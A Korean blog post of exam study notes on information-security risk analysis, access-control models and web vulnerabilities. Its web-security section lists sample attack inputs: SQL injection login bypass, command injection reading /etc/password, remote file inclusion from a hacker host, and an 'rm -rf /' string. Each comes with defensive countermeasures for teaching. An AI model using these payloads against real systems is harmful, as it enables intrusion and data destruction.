프로그래머의 삶 Programmer's Life/개념과 상식의 이야기? Concept Vs Common sense?

정보보안기사 위험분석 정리

Oliver's World 2014. 7. 3. 17:02
728x90

 

* 위험관리(Risk Management) - 조직의 자산에 대한 위험을 수용할 수 있는 수준으로 유지하기 위하여 자산에 대한 위험을 분석하고 이러한 위험으로부터 자산을 보호하기 위해 비용대비 효과적인 보호대책을 마련하는 일련의 과정

* 위험 = 위협 + 취약성 + 자산의 가치

* 자산(Assets) - 조직이 보호해야할 대상으로서 정보, 하드웨어, 소프트웨어, 시설등을 말하며 관련 인력, 기업 이미지 등의 무형자산을 포함하기도 한다.
 - 조직의 생존과 사업 연속성을 위해 보호해야 하는 대상 

 - 정보보호의 관점에서는 자산은 정보자산과 정보의 효율적인 활요을 위한 관련자산

* 자산에 손실을 초래할 수 있는, 원치않는 사건의 잠재적 원인(source) 이나 행위자(agent) 로 정의되는 것은 ?  위협(Threats)
 - 자산이 가지고 있는 취약성으로 인하여 자산ㅇ 손상 및 손실 등을 일으킬 수 있는 외부의 원인 또는 이벤트(사건, 행위)

* 자신의 잠재적 속성으로써 위협의 이용 대상으로 정의하나, 때로는 정보보호대책의 미비로 정의되기도 한다. 자산에 취약성(Vulnerability)이 없다면 위협이 발생해도 손실이 나타나지 않는다는 점에서, 취약성은 자산과 위협사이의 관계를 맺어주는 특성을 파악할 수 있다. 
 - 위협에 의해 손실이 발생하게 되는 자산에 내재된 약점

* 정보보호 책임자 - 정보보호 조직의 구성 및 운영 총괄
                       - 정보보호방침 및 계획 실무지침 수립 및 승인
                       - 관리적/기술적/물리적 보호조치 이행 총괄
                       - 침해사고 등 비상상황시 긴급조치 수행
   정보보호관리자 - 정보보호 활동의 계획 및 관리
                       - 정보보호 활동의 조정                       
                       - 정보보호 방침의 유지 이행
                       - 위험분석 및 관리
                       - 보안사고 대응 및 복구관리
   정보보호담당자 - 정보통신설비 및 시설의 보안계획, 방법, 절차 수립이행
                       - 구현된 보안대책의 운영, 관리
                       - 보안사고 모니터링 및 대응

* 베이스라인 접근법(Baseline Approach) - 위험분석을 수행하지 않고 모든 시스템에 대하여 표준화된 대책을 체크리스트 형태로 제공하는 것을 말한다. 특히, 보안관리를 수행하기 어려운 소규모 조직이나 대규모 조작에 중요하지 않은 일반 자산에 대하여 사용하는 접근법이다.

* 상세위험분석(Detailed Risk Analysis) - 자산분석, 위험분석, 취약성 분석의 각 단계를 수행하여 위험을 분석하는 것을 말한다. 조직의 자산 및 보안 요구 사항을 구체적으로 분석하여 가장 적절한 대책을 수립할 수 있는 방법이다.

* 위험분석에는 크게 손실이나 위험을 개략적인 크기로 비교하는 정성적(Qualitative)분석방법 과 손실이나 위험의 크기를 숫자 또는 금액으로 나타내는 정량적(Quantitative) 분석 방법이 있다. 

* 정성적 위험 평가 방법
 1) 델파이법 - 전문가 집단의 의견과 판단을 추출하고 종합하기 위하여 동일한 전문가 집단에게 설문조사를 실시하여 의견을 정리하는 분석방법이다. 짧은 시간에 도출할 수 있기 때문에 시간과 비용이 절약되지만 전문가의 추정이라 정확도가 낮다는 단점이 있다. 
 2) 시나리오법 - 어떠한 사실도 기대대로 발생하지 않는다는 조건하에서 특정 시나리오를 통하여 발생 가능한 위협의 결과를 우선순위로 도출해 내는 방법을 말한다. 적은 정보를 가지고 전반적인 가능성을 추론할 수 있지만 발생 가능성의 이론적 추측에 불과하여 정확성이 낮다
 3) 순위결정법 - 비교우위순위 결정표에 위험 항목들의 서술적 순위를 결정하는 방식. 위험의 추정 정확도가 낮다는 단점이 있다. 

* 정량적 위험 평가 방법
 1) 과거자료분석법 - 과거자료를 통하여 위험 발생 가능성을 예측하는 방법. 이는 과거에 대한 자료가 많으면 많을수록 분석의 정확도가 높아지는 반면에 과거의 사건이 미래의 발생이 낮아질 수 있는 환경에 대해서는 적용이 어렵다는 단점이 있다. 
 2) 수학공식접근법 - 과거자료분석법이 어려울 경우 사용되는 방법이며 위협 발생빈도를 계산하는 식을 이용하여 위험을 계량화 하는것을 말한다. 기대손실을 추정하는 자료의 양이 적다는 것이 단점
 3) 확률분포법 - 미지의 사건을 확률적으로 편차를 이용하여 최저/보통/최고 위험평가를 예측하는 방법. 추정하는 것이라 정확도가 나다

* 위험 처리의 방법
 1) 위험수용(Acceptance) - 위험의 잠재 손실 비용을 감수하는 것으로 어떠한 대책을 도입하더라도 완전히 제거할 수 없으므로 일정수준 이하의 수준을 감수하고 사업을 진행하는 방법
 2) 위험감소(Mitigation) - 위험을 감소시킬 수 있는 대책을 채택하여 구현하는 것. 많은 비용이 소요되기 때문에 실제 감소되는 위험의 크기와 비교하여 비용분석을 실시한다.
 3) 위험회피(Risk Avoidance) - 위험이 존재하는 프로세스나 사업을 수행하지 않고 포기하는 것을 말한다
 4) 위험전가(Risk Transfer) - 보험이나 외주 등으로 잠재적 비용을 제3자에게 이전하거나 할당하는 것

* 위험분석 - 조직은 정보자산의 식별 후에 식별된 정보자산에 영향을 줄 수 있는 모든 위협과 취약성, 위험을 식별하고 분류하여야 하며, 이 정보 자산의 가치와 위험을 고려하여 잠재적 손실에 대한 영향을 식별 분석해야 한다.

* 위험평가 - 정보자산에 대한 잠재적 및 알려진 위협과 취약성으로 나타날 수 있는 조직의 피해와 현재 구현된 정보보호대책의 실패 가능성 및 영향을 평가하고 수용 가능한 위험수준을 포함하여야 한다. 이를 통해 정보자산의 위험을 관리할 수 있는 적절한 정보보호대책 선택 및 우선순위의 확보를 지원하여야 한다.

* 국내 보안성평가(CC)의 평가기관으로 지정된 곳 - 한국인터넷진흥원(KISA), 한국산업기술시험원(KTL), 한국시스템보증(KOSYAS), 한국아이티평가원(KSEL), 한국정보통신기술협회(TTA)

* TCSEC(Trusted Computer System Evaluation Criteria) - 미국에서 1985년 최초로 만들어진 일명 '오렌지북'이라고 불린다. TCSEC 에서는 정보제품의 보안성에 영향을 줄 수 있는 보안요구를 보안정책, 책임성, 신뢰성, 문서화로 분류하여 기본요구사항을 명시적으로 정의하고 수준에 따라 7단계 보안 등급을 규정한다. 

* ITSEC - 유럽의 여러 나라에 보안평가 기준이 있었으나 기술적 제약 및 중복 평가문제를 개선하기 위하여 1991년에 유럽 각국의 기준과 미국의 TCSEC의 내용을 참조하여 새로운 유럽 공통 평가 기준인 ITSEC을 공동으로 마련하여 발표하였다.

* 임의적 접근통제(DAC : Discretionary Access Control) - 어떠한 사용자든 임의적으로 다른 사용자에게 객체에 대한 접근을 허용할 수 있는 기법을 말한다. DAC는 접근을 요청하는 사용자의 식별에 기초하여 어떤 객체에 대하여 사용자가 접근 권한을 추가 또는 삭제할 수 있다.

* 강제적 접근통제(MAC : Mandatory Access Control) - 주체(사용자)의 객체(정보)에 대한 접근이 주체의 빔리 취급ㅇ니가 레이블과 각 객체에 부여된 민감도 레이블에 따라 접근을 허용할지를 결정하는 방식

* 역할기간정근통제(Role Base Access Control) - 비 임의적 접근통제라고도 하는데 주체와 객체가 어떻게 상호작용을 하는지 결정하는 통제들이 중앙에서 집중적으로 관리된다. 회사내에서 사용자가 담당하는 역할에 근거하여 자원에 대한 접근을 관리한다. 

* 벨-라파듈라(Bell-Lapadula) 모델 - 미 국방부의 다수준 보안정책으로부터 정책이 개발되었다. 객체에 대한 기밀성을 유지하는데 중점을 두고 있으며 객체에 대한 무결성 또는 가용성 측면은 대처하지 않는다. 분류된 정보가 덜 안전한 수준으로 이관하거나 전송하는 것을 방지하는 접근통지방식(No-Write-Down)

* 비바(Biba) 모델 - 비군사적 조직에 있어서 무결성은 기밀성보다 중요하다. 기밀성과 가용성이 아닌 단지 무결성만 대처하는 접근 통제 모델

* 클락 윌슨(Clark-Wilson) 모델 - 무결성 관점에서 접근통제모델이며 주체는 객체에 대한 직접적인 접근을 가지지 않으며, 객체는 오직 프로그램을 통하여 접근가능하다. 효율적인 업무처리, 임무분할 두가지 원칙의 사용을 통하여 효과적인 무결성 보호 수단을 제공한다. 

* 위험은 보호대책에 의해 부분적으로 경감할 뿐 완전히 제거할 수 없다. 보다 완벽하게 위험을 제거하는 데는 그에 상당하는 비용이 증가한다. 따라서 조직의 보안 필요성에 적절한 수준의 보호 대책을 수립하고 그 이상의 잔류위험은 인식하고 있어야한다. 

* SO/IEC 27004 - ISO/IEC 27001에서 요구하는 정보보호관리체계(ISMS)의 효과성을 평가하기 위한 측정 프레임워크를 다루고 있는 표준

* 정량적 예상손실액 계산법 ==> 연간예상손실액 = 회산자산가치 x 노출계수 x 연간발생률  

* 정보보호 관리등급제도의 법적근거 - 정보통신망법 제47조의5
 ==> 47조의 5(정보보호 관리등급 부여)
       1) 정보보호 관리체계 인증을 받은 자는 기업의 통합적 정보보호 관리 수준을 제고하고 이용자로부터 정보보호 서비스에 대한 신뢰를 확보하기 위하여 미래창조과학부장관으로부터 정보보호 관리등급을 받을 수 있다. 
       2) 미래창조과학부장관은 한국인터넷진흥원으로 하여금 제1항에 따른 등급 부여에 관한 업무를 수행하게 할 수 있다.

* 위험도분석 - 개인정보처리시스템에 적용하고 있는 개인정보보호를 위한 수단이자 유출시 정보주체의 권리를 침해할 위험의 정도를 분석하는 행위

* 위험도분석기준 - 내부망에 고유식별정보를 암호화하지 않고 저장하는 경우 개인정보처리자가 이행하여야할 최소한의 보호조치 기준으로 어느 하나의 항목이라도 '아니오'에 해당하는 경우 암호화 대상이 되는 기준

* No-Read-Up - 보안수준이 낮은 주체는 보안수준이 높은 객체를 읽어서는 안되는 보안정책(벨-라파듈라모델)

* 보안평가수준 7단계 
 1) 관리적 부문 - 정보보호관리체게예 준하여 관련된 분야를 선별하고 설문 및 면담하고 평가한다.
 2) 물리적 부문 - 서버 및 네트워크 장비의 물리적 보안상태에 대하여 평가한다.
 3) 네트워크 부문 - 네트워크 장비의 기술적 보안 현황에 대하여 평가한다.
 4) 시스템 부문 - 각 업무 프로세스별 서버들의 기술적 보안현황에 대하여 평가한다.
 5) 응용시스템 부문 - 각 업무 프로세스별로 업무 수행을 위해 사용되는 응용 시스템의 기술적 보안현황에 대하여 평가한다.
 6) 데이터베이스 부문 - 각 업무 프로세스별로 업무수행을 위해 사용되는 데이터베이스 기술적 현황에 대하여 평가한다.
 7) PC 및 기타 단말기 - PC 및 기타 단말기들의 기술적 보안현황에 대하여 평가한다.

* 보안수준현황 점검 항목별 검사 결과를 위한 평가 답변 방법
 1) Y - 점검 항목에 대해 보안수준이 매우 양호
 2) P2 - 점검 항목에 대해 양호하나 일부 미흡한 점이 있다. 
 3) P1 - 점검 항목에 대해 보안이 이루어지고 있으나 미흡하다.
 4) N - 점검 항목에 대해 보안이 거의 이루어지지 않고 있거나 보안이 되고 있지 않다. 

* 웹 보안 - 주로 다른 사용자에게 악성 코드를 보낼 때 사용 기법으로 XSS라고 불리며 웹 어플리케이션이 다른 사용자의 브라우저를 공격하는 도구로 사용된다. 
 1) 저장식 공격 - 게시판, 로그정보, 주석 등 서버에 영구적으로 젖아된 자료로 공격
 2) 반향식 공격 - 에러메시지, 검색 결과 등 서버에 요청하여 응답을 받는 과정을 이용하여 공격
==>> 웹 보안!!!
 1) 사이버 공격 형태
 - URL상의 XSS공격
 - 게시판에 대한 XSS공격
 - 공격이 성공하는 경우 일반 사용자의 세션 토큰이 노출되거나, 사용자의 컴퓨터를 공격하거나, 다른 사용자를 속이기 위해 위조된 컨텐츠를 보여주게 된다.
 2) 취약점 점검 방법
 - 게시판에 HTML 코드나 자바스크립트 삽입  가능 여부
 - 사이트의 검새간에 HTML코드나 자바스크립트 삽입 가능 여부 ex) http://xxx.xxx.com/search.jsp?word=<font color=red>test</font>
 - 서버 에러 메시지를 조작하여 HTML 코드나 자바스크립트를 삽입할 수 있는지 확인 ex) http://xxx.xxx.com/error.jsp?error=<font color=red>test</font>
 3) 대응조치
 - 웹어플리케이션에 전달되는 인수는 다음의 허용된 값만 받아들여야 한다. ( 허용된 문자셋, 데이터유형, NULL 값 허용 여부 정의)
 - 사용자용 게시판 등과 같은 매개체에 사용자 입력값 검증루틴을 거친다.
 - 어플리케이션 차원에서 HTTP헤더, HTML, Java/VBScript, Flash, FIG/JPG, 쿠키, 쿼리 스트링, 폼필드, 히든 필드 등의 모든인자에 대해 허용된 유형의 데이터만 입력할 수 있도록 한다
 

* 삽입 취약점(injection flaws) - 웹 어플리케이션의 외부 시스템이나 자체 운영체제에 접근할때 입력받은 인자를 그대로 전달한다
 > 악성코드를 원하는 시스템에 전송가능
 > sql문 구문을 삽입하여 DB서버에 침투 가능
 > 인수에 특수문자를 삽입하여 서버 내부에 명령 전달 가능                                       
 1) 사이버 공격 형태
 - 공격자가 해당 인자로 악의적인 명령어를 삽입하는 경우 , 해당 외부 시스템은 웹어플맄에ㅣ션으로 인해 입력받은 명령어를 실행하게된다.
 - 취약한 웹 어플리케이션을 통해 악성 코드를 전송하여 시스템 콜을 통한 OS호출, 쉘 명령어를 통한 외부 프로그램 사용, SQL 구문을 통한 백엔드 데이터베이스 호출 등을 수행
 2) 취약점 점검 방법
 - SQL Injection취약점을 이용하여 패스워드 없이 로그인 ex) http://xxx.xxx.com/login.asp?id=' or 1=1 --&password=test
 - 인수에 특수문자를 삽입하여 서버 내부에 명령전달 ex) http://xxx.xxx.com/main.cgi?file=test|cat /etc/password|&cmd=download
 - 외부스크립트를 서버 내부에 삽입 ex) http://xxx.xxx.com/board.php?include="http://hacker.com/hack.txt"
 - 시스템 명령어 삽입 기능(; rm?rf/) ex) Code Injection ( test.cgi?dir=http://www.test.com/test.cgi )
 - 관리자 ID와 패스워드에 아래 문자열을 입력하여 결과를 확인  ex) or 1=1 
 3) 대응조치
 - 가능한 한 외부 인터프리터를 사용하지 않는다.
 - 백엔드 데이터베이스 호출할 경우, 입력 값을 주의깊게 검증
 - 데이터베이스와 연동을 하는 스크립트의 모든 파라미터를 점검
 - 사용자 입력시 특수문자 ('"/\;:-+ 등)가 포함되어 있는지 검사
 - 웹 어플리케이션이 사용하는 데이터베이스 사용자의 권한을 제한(DB서버와 웹 서버 연동시 DB서버에 웹 서버 전용 계정으로 접근 설정)

* 디렉토리 리스팅 취약점 - 인터넷 사용자에게 웹 서버 내 모든 디렉토리 및 파일 목록을 보여주고, 파일의 열람 및 저장도 가능하게 하는 취약점
 => 서버에서 "http.conf" 파일을 찾아 내용중에 Options항목뒤에 indexes라는 단어를 지우고 파일에 저장. 이때, Options는 디렉토리별로 설정할 수 있게 되어 있으므로 모든 디렉토리에 대해서 Options 항목을 제거한다. 설정을 적용하기 위해 웹 서버 데몬을 다시 구동한다.

* SARA(Security Auditor's Research Assistant) - 한때 유명했던 프로그램중 하나인 SATAN(Security Administrator's Tool for Analyzing Networks)이라는 프로그램을 응용하여 개발한 것이다. 처음에 SATAN이 공개되었을 때는 그 이름만큼 반항을 일으켰지만 이후 업데이트 등이 제대로 이루어지지 않아 현재는 역사속의 프로그램으로만 기억되고 있다. 취약성 결과에 대해 서비스벼르 취약성별 등 여러 기준으로 구분하여 조회할 수 있으며 HTML 이나 XML등의 형식으로 리포트가 작성된다.

* MBSA(Microsoft Baseline Security Analyzer) - 로컬시스템뿐만 아니라 네트워크스캐닝을 통해 MS윈도우즈 시스템들의 취약점을 점검해 주는 스캐닝 도구

* 자산(Asset) - 정보(데이터), 소프트웨어(컴퓨터 소프트웨어 등 ) , 물리적 자산(서버 등) , 서비스 ,인력 등 조직에서 보유하고 있는 가치가 있는 모든 것

* 조직에서 보유하고 있는 다수 자산의 관리 효율성 제고를 위해 자산유형, 보안특성, 중요도가 같은 자산들을 묶어서 하나의 그룹 자산으로 관리할 수 있는데 이를 자산의 그룹핑(Grouping)정책 이라고 한다. 

* Nessus - 네트워크에 연결되어 있는 서버와 네트워크 장비에 대한 스캐닝 점검을 통해 보안상 취약한 서비스 서버설정, 낮은 버전의 프로그램 등을 알려줌으로써 보안사고를 미연에 방지하도록 도움을 준다. 취약점에 대한 빠른 plug-in제공으로 네트워크에서 설치되어 있는 패치 대상 장비를 쉽게 찾아주는 대표적인 취약점 점검도구

 
728x90